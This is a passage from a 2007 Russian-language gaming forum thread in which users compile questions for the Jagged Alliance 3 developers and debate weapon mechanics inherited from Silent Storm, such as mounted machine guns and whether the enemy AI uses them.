этих целей (частично совпадает с вопросом № 7 из предыдущего перечня)?
|
« Изменён в : 16.05.2007 в 16:14:56 пользователем: Docent » |
Зарегистрирован |
Вот у меня один знакомый - тоже учёный - у него 3 класса образования... А он десятку за полчаса так нарисует - не отличишь от настоящей.
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #337 от 17.05.2007 в 11:00:46 » |
|
От меня вопрос: N.: Будут ли в JA3 такие способы использования оружия из S^2 как: - Меткий выстрел на все AP. - Длинная очередь на все AP. - Снайперский выстрел, растягивающийся на несколько ходов. - Стрельба из стационарных орудий. - Стрельба на звук. ? 2Docent: Quote: 7. Хочется услышать пояснения по поводу термина из пресс-релиза игры: "генерируемые этапы, отличающиеся уникальным стилем прохождения и сложностью" : rolleyes :? Чем они отличаются от сюжетных миссий, какую роль играют в игре? |
| В S^2 было вроде такого: каждый сектор являлся ключом к открытию нескольких других. При этом стартовым сектором по сюжету могли быть разные сектора. Всё это давало как бы уникальное "дерево прохождения" по сюжету, ведущее к финалу по нескольким "ветвям".
|
« Изменён в : 17.05.2007 в 11:01:20 пользователем: bugmonster » |
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
Novik [Человек и пароход]
Полный псих
Репутация: +224
|
|
Re: Jagged Alliance 3 « Ответ #338 от 17.05.2007 в 11:22:45 » |
|
Quote:При этом стартовым сектором по сюжету могли быть разные сектора. |
| Нет. Стартовые сектора обоих кампаний фиксированы.
|
|
Зарегистрирован |
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #339 от 17.05.2007 в 13:06:30 » |
|
2Novik: Я имею ввиду не "завязочный" сектор, а тот который становится видим после попадания на базу и набора команды.
|
|
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #340 от 17.05.2007 в 19:26:37 » |
|
Все хватит пока вопросов, отправляю.
|
|
Зарегистрирован |
|
|
|
Ushwood [ДжАдай]
Прирожденный Джаец
May the Force be with you
Пол: Репутация: +562
|
|
Re: Jagged Alliance 3 « Ответ #341 от 18.05.2007 в 13:50:52 » |
|
2bugmonster: Quote:- Стрельба из стационарных орудий. |
| По-моему, про это говорили, что будет. Ну, может, не про орудия, а про тяжелые пулеметы.
|
|
Зарегистрирован |
Мои текущие переводы: Червь арка 30, версия 12.03.24
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #342 от 18.05.2007 в 19:04:17 » |
|
Quote:По-моему, про это говорили, что будет. |
| С чего бы не быть? Двиг SS позволяет... ИИ тоже должен уметь им пользоваться... вроде...
|
|
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
Дядя Боря [Скелет Старого Кота]
Прирожденный Джаец
Дурка этот форум :)
Пол: Репутация: +841
|
|
Re: Jagged Alliance 3 « Ответ #343 от 18.05.2007 в 19:09:49 » |
|
Quote:ИИ тоже должен уметь им пользоваться... вроде... |
| Если будет пользоваться как в оригинале, то....
|
|
Зарегистрирован |
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #344 от 18.05.2007 в 19:31:51 » |
|
2Macbeth: С чего не быть? А вдруг станковые пулемёты - это "излишний миккроменеджмент, который отвлекает от процесса игры"? К тому же этот дурковатый Ричард Терьен со своим видением великого "Духа Джа". Может он считает, что станковое оружие не соответствует этому "духу". ИИ стационарными орудиями в SS не пользовался. В SS были и шагающие бронекостюмы-экзоскелеты, так чего их теперь в JA3 пихать только потому, что они тем есть?
|
|
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #345 от 18.05.2007 в 23:15:18 » |
|
Quote:В SS были и шагающие бронекостюмы-экзоскелеты, так чего их теперь в JA3 пихать только потому, что они тем есть? |
| Ну перегибать тоже не надо. Quote:ИИ стационарными орудиями в SS не пользовался. |
| Это сказано наобум или сначала перепроверено, а потом сказано? Quote:Может он считает, что станковое оружие не соответствует этому "духу". |
| Пределов человеческой тупизны как известно нет, но все же это один из самых частых вопросов для тактических игр и глупо не воспользоваться тем, что и так уже есть в купленном у Нивала движке... Хотя все моет быть...
|
|
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
Ushwood [ДжАдай]
Прирожденный Джаец
May the Force be with you
Пол: Репутация: +562
|
|
Re: Jagged Alliance 3 « Ответ #346 от 19.05.2007 в 19:44:00 » |
|
2bugmonster: Quote:ИИ стационарными орудиями в SS не пользовался. |
| Пользовался. Хотя я нечасто предоставлял ему такую возможность .
|
|
Зарегистрирован |
Мои текущие переводы: Червь арка 30, версия 12.03.24
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #347 от 21.05.2007 в 11:47:18 » |
|
Я много раз играл в оригинальный SS но без патча. Ни разу по моим не стреляли из станковых орудий. Может это появилось только в патче или карты/расстановка так неудачно были сделаны? ЗЫ Сейчас повспоминал - единственные 1-2 места в игре в которых боты находились рядом со стационарными орудиями - это был станковый пелумёт, установленный в здании перед закрытым окном. При этом, если специально не открыть окно, то ничего не видно и стрелять можно только на слух.
|
« Изменён в : 21.05.2007 в 11:51:35 пользователем: bugmonster » |
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
desants [Десантура!]
Прирожденный Джаец
Пол: Репутация: +500
|
|
Re: Jagged Alliance 3 « Ответ #348 от 21.05.2007 в 15:05:35 » |
|
2bugmonster: Не могу не поерничать - может потому, что из Quote: стрелять не с руки
|
« Изменён в : 21.05.2007 в 15:05:54 пользователем: desants » |
Зарегистрирован |
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #349 от 21.05.2007 в 16:07:08 » |
|
2desants: Не заметил.
|
|
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
|